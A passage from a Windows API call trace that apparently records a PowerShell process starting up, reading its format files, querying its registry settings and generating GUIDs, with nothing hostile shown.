ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0251.539] SetErrorMode (uMode=0x1) returned 0x1 [0251.540] SetErrorMode (uMode=0x1) returned 0x1 [0251.540] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0251.540] SetErrorMode (uMode=0x1) returned 0x1 [0251.541] SetErrorMode (uMode=0x1) returned 0x1 [0251.541] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0251.541] SetErrorMode (uMode=0x1) returned 0x1 [0251.546] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0251.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0251.546] CoTaskMemFree (pv=0x343980) [0251.555] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0251.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0251.556] CoTaskMemFree (pv=0x343980) [0251.557] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0251.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0251.557] CoTaskMemFree (pv=0x343980) [0251.558] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0251.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0251.558] CoTaskMemFree (pv=0x343980) [0251.559] SetErrorMode (uMode=0x1) returned 0x1 [0251.560] SetErrorMode (uMode=0x1) returned 0x1 [0251.560] GetFileType (hFile=0x310) returned 0x1 [0251.560] ReadFile (in: hFile=0x310, lpBuffer=0x355ab20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x355ab20*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.619] ReadFile (in: hFile=0x310, lpBuffer=0x355ab20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x355ab20*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.620] ReadFile (in: hFile=0x310, lpBuffer=0x355ab20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x355ab20*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.620] ReadFile (in: hFile=0x310, lpBuffer=0x355ab20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x355ab20*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.621] ReadFile (in: hFile=0x310, lpBuffer=0x355ab20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x355ab20*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.621] ReadFile (in: hFile=0x310, lpBuffer=0x355ab20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x355ab20*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.621] ReadFile (in: hFile=0x310, lpBuffer=0x355ab20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x355ab20*, lpNumberOfBytesRead=0x16ccf8*=0x9e2, lpOverlapped=0x0) returned 1 [0251.621] ReadFile (in: hFile=0x310, lpBuffer=0x355a06a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x355a06a*, lpNumberOfBytesRead=0x16ccf8*=0x0, lpOverlapped=0x0) returned 1 [0251.621] ReadFile (in: hFile=0x310, lpBuffer=0x355ab20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x355ab20*, lpNumberOfBytesRead=0x16ccf8*=0x0, lpOverlapped=0x0) returned 1 [0251.623] SetErrorMode (uMode=0x1) returned 0x1 [0251.623] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cca0 | out: lpFileInformation=0x16cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0251.624] SetErrorMode (uMode=0x1) returned 0x1 [0251.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0251.625] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cd88 | out: phkResult=0x16cd88*=0x310) returned 0x0 [0251.625] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cd0c, lpData=0x0, lpcbData=0x16cd08*=0x0 | out: lpType=0x16cd0c*=0x1, lpData=0x0, lpcbData=0x16cd08*=0x56) returned 0x0 [0251.626] CoTaskMemAlloc (cb=0x5a) returned 0x379cd0 [0251.626] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16ccdc, lpData=0x379cd0, lpcbData=0x16ccd8*=0x56 | out: lpType=0x16ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ccd8*=0x56) returned 0x0 [0251.626] CoTaskMemFree (pv=0x379cd0) [0251.627] RegCloseKey (hKey=0x310) returned 0x0 [0251.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0251.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0251.658] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x3a0e05e1, Data2=0xec5a, Data3=0x4357, Data4=([0]=0xa7, [1]=0x73, [2]=0xd1, [3]=0x48, [4]=0xa2, [5]=0xef, [6]=0xae, [7]=0x68))) returned 0x0 [0251.678] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x20fb35e3, Data2=0x47c1, Data3=0x4789, Data4=([0]=0x8e, [1]=0xc3, [2]=0xde, [3]=0xbf, [4]=0x30, [5]=0x9f, [6]=0xa6, [7]=0x9e))) returned 0x0 [0251.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0251.682] SetErrorMode (uMode=0x1) returned 0x1 [0251.682] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0251.682] GetFileType (hFile=0x310) returned 0x1 [0251.682] SetErrorMode (uMode=0x1) returned 0x1 [0251.682] GetFileType (hFile=0x310) returned 0x1 [0251.682] ReadFile (in: hFile=0x310, lpBuffer=0x3585688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3585688*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.685] ReadFile (in: hFile=0x310, lpBuffer=0x3585688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3585688*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.685] ReadFile (in: hFile=0x310, lpBuffer=0x3585688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3585688*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.686] ReadFile (in: hFile=0x310, lpBuffer=0x3585688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3585688*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.686] ReadFile (in: hFile=0x310, lpBuffer=0x3585688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3585688*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.687] ReadFile (in: hFile=0x310, lpBuffer=0x3585688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3585688*, lpNumberOfBytesRead=0x16ccf8*=0xfb2, lpOverlapped=0x0) returned 1 [0251.687] ReadFile (in: hFile=0x310, lpBuffer=0x3584da2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3584da2*, lpNumberOfBytesRead=0x16ccf8*=0x0, lpOverlapped=0x0) returned 1 [0251.687] ReadFile (in: hFile=0x310, lpBuffer=0x3585688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3585688*, lpNumberOfBytesRead=0x16ccf8*=0x0, lpOverlapped=0x0) returned 1 [0251.687] CloseHandle (hObject=0x310) returned 1 [0251.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0251.688] SetErrorMode (uMode=0x1) returned 0x1 [0251.688] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cca0 | out: lpFileInformation=0x16cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0251.688] SetErrorMode (uMode=0x1) returned 0x1 [0251.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0251.688] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cd88 | out: phkResult=0x16cd88*=0x310) returned 0x0 [0251.688] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cd0c, lpData=0x0, lpcbData=0x16cd08*=0x0 | out: lpType=0x16cd0c*=0x1, lpData=0x0, lpcbData=0x16cd08*=0x56) returned 0x0 [0251.688] CoTaskMemAlloc (cb=0x5a) returned 0x37a210 [0251.688] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16ccdc, lpData=0x37a210, lpcbData=0x16ccd8*=0x56 | out: lpType=0x16ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ccd8*=0x56) returned 0x0 [0251.688] CoTaskMemFree (pv=0x37a210) [0251.689] RegCloseKey (hKey=0x310) returned 0x0 [0251.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0251.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0251.691] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x210998e7, Data2=0x62fe, Data3=0x48e8, Data4=([0]=0x8f, [1]=0xc3, [2]=0xc9, [3]=0xbe, [4]=0x1a, [5]=0x5, [6]=0xf7, [7]=0xf0))) returned 0x0 [0251.701] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x55a4e09a, Data2=0x9078, Data3=0x4df1, Data4=([0]=0x8f, [1]=0x9c, [2]=0xb8, [3]=0x8b, [4]=0x36, [5]=0x5f, [6]=0xe4, [7]=0x73))) returned 0x0 [0251.707] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x5172b541, Data2=0x9ed8, Data3=0x40a2, Data4=([0]=0xaf, [1]=0x7c, [2]=0x6, [3]=0xa2, [4]=0x7c, [5]=0xcb, [6]=0xd8, [7]=0x13))) returned 0x0 [0251.709] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xd19ad9fd, Data2=0x9380, Data3=0x4db0, Data4=([0]=0x9a, [1]=0x5e, [2]=0xde, [3]=0x88, [4]=0xab, [5]=0x27, [6]=0x62, [7]=0xbd))) returned 0x0 [0251.711] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xcb0c2c11, Data2=0x428a, Data3=0x41ca, Data4=([0]=0xa5, [1]=0x10, [2]=0x89, [3]=0x98, [4]=0x90, [5]=0x6, [6]=0xd5, [7]=0x18))) returned 0x0 [0251.713] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x97184b61, Data2=0x33be, Data3=0x4d62, Data4=([0]=0xbf, [1]=0x21, [2]=0x77, [3]=0x38, [4]=0xc1, [5]=0x61, [6]=0x7e, [7]=0x13))) returned 0x0 [0251.715] SetErrorMode (uMode=0x1) returned 0x1 [0251.716] SetErrorMode (uMode=0x1) returned 0x1 [0251.716] GetFileType (hFile=0x310) returned 0x1 [0251.716] ReadFile (in: hFile=0x310, lpBuffer=0x35d13e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x35d13e8*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.732] ReadFile (in: hFile=0x310, lpBuffer=0x35d13e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x35d13e8*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.733] ReadFile (in: hFile=0x310, lpBuffer=0x35d13e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x35d13e8*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.733] ReadFile (in: hFile=0x310, lpBuffer=0x35d13e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x35d13e8*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.734] ReadFile (in: hFile=0x310, lpBuffer=0x35d13e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x35d13e8*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.734] ReadFile (in: hFile=0x310, lpBuffer=0x35d13e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x35d13e8*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0251.734] ReadFile (in: hFile=0x310, lpBuffer=0x35d13e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x35d13e8*, lpNumberOfBytesRead=0x16ccf8*=0xaca, lpOverlapped=0x0) returned 1 [0251.734] ReadFile (in: hFile=0x310, lpBuffer=0x35d0a1a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x35d0a1a*, lpNumberOfBytesRead=0x16ccf8*=0x0, lpOverlapped=0x0) returned 1 [0251.735] ReadFile (in: hFile=0x310, lpBuffer=0x35d13e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x35d13e8*, lpNumberOfBytesRead=0x16ccf8*=0x0, lpOverlapped=0x0) returned 1 [0251.735] CloseHandle (hObject=0x310) returned 1 [0251.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0251.735] SetErrorMode (uMode=0x1) returned 0x1 [0251.735] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cca0 | out: lpFileInformation=0x16cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0251.735] SetErrorMode (uMode=0x1) returned 0x1 [0251.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0251.737] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cd88 | out: phkResult=0x16cd88*=0x310) returned 0x0 [0251.737] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cd0c, lpData=0x0, lpcbData=0x16cd08*=0x0 | out: lpType=0x16cd0c*=0x1, lpData=0x0, lpcbData=0x16cd08*=0x56) returned 0x0 [0251.737] CoTaskMemAlloc (cb=0x5a) returned 0x37a210 [0251.737] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16ccdc, lpData=0x37a210, lpcbData=0x16ccd8*=0x56 | out: lpType=0x16ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ccd8*=0x56) returned 0x0 [0251.737] CoTaskMemFree (pv=0x37a210) [0251.737] RegCloseKey (hKey=0x310) returned 0x0 [0251.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0251.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0251.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0252.036] VirtualQuery (in: lpAddress=0x16b820, lpBuffer=0x16c6e0, dwLength=0x30 | out: lpBuffer=0x16c6e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.038] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x58c097ef, Data2=0xf940, Data3=0x4bb1, Data4=([0]=0xa7, [1]=0x63, [2]=0xc, [3]=0xdc, [4]=0x27, [5]=0xa9, [6]=0x26, [7]=0x18))) returned 0x0 [0252.043] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x5df8523f, Data2=0xb748, Data3=0x4a47, Data4=([0]=0xbf, [1]=0x85, [2]=0x63, [3]=0xa8, [4]=0xc3, [5]=0xf, [6]=0x7a, [7]=0xd0))) returned 0x0 [0252.044] VirtualQuery (in: lpAddress=0x16b9d0, lpBuffer=0x16c890, dwLength=0x30 | out: lpBuffer=0x16c890*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.046] VirtualQuery (in: lpAddress=0x16b9d0, lpBuffer=0x16c890, dwLength=0x30 | out: lpBuffer=0x16c890*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.048] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xf9fd567, Data2=0x280c, Data3=0x4fc1, Data4=([0]=0x9d, [1]=0x3e, [2]=0xca, [3]=0x36, [4]=0x6f, [5]=0x87, [6]=0x94, [7]=0x9f))) returned 0x0 [0252.058] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x6b05b56b, Data2=0xe40f, Data3=0x4e68, Data4=([0]=0x86, [1]=0x9a, [2]=0xa2, [3]=0x3c, [4]=0x71, [5]=0x7a, [6]=0x64, [7]=0xff))) returned 0x0 [0252.058] VirtualQuery (in: lpAddress=0x16bc20, lpBuffer=0x16cae0, dwLength=0x30 | out: lpBuffer=0x16cae0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.061] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.064] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.067] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xe915c11c, Data2=0xb2bc, Data3=0x44ef, Data4=([0]=0x81, [1]=0x69, [2]=0x72, [3]=0x2c, [4]=0xa, [5]=0x3f, [6]=0x7d, [7]=0x47))) returned 0x0 [0252.068] VirtualQuery (in: lpAddress=0x16bc20, lpBuffer=0x16cae0, dwLength=0x30 | out: lpBuffer=0x16cae0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.070] VirtualQuery (in: lpAddress=0x16ba40, lpBuffer=0x16c900, dwLength=0x30 | out: lpBuffer=0x16c900*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.072] VirtualQuery (in: lpAddress=0x16b290, lpBuffer=0x16c150, dwLength=0x30 | out: lpBuffer=0x16c150*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.073] VirtualQuery (in: lpAddress=0x16b290, lpBuffer=0x16c150, dwLength=0x30 | out: lpBuffer=0x16c150*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.077] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xb0e0631, Data2=0xaefc, Data3=0x4a5d, Data4=([0]=0xa4, 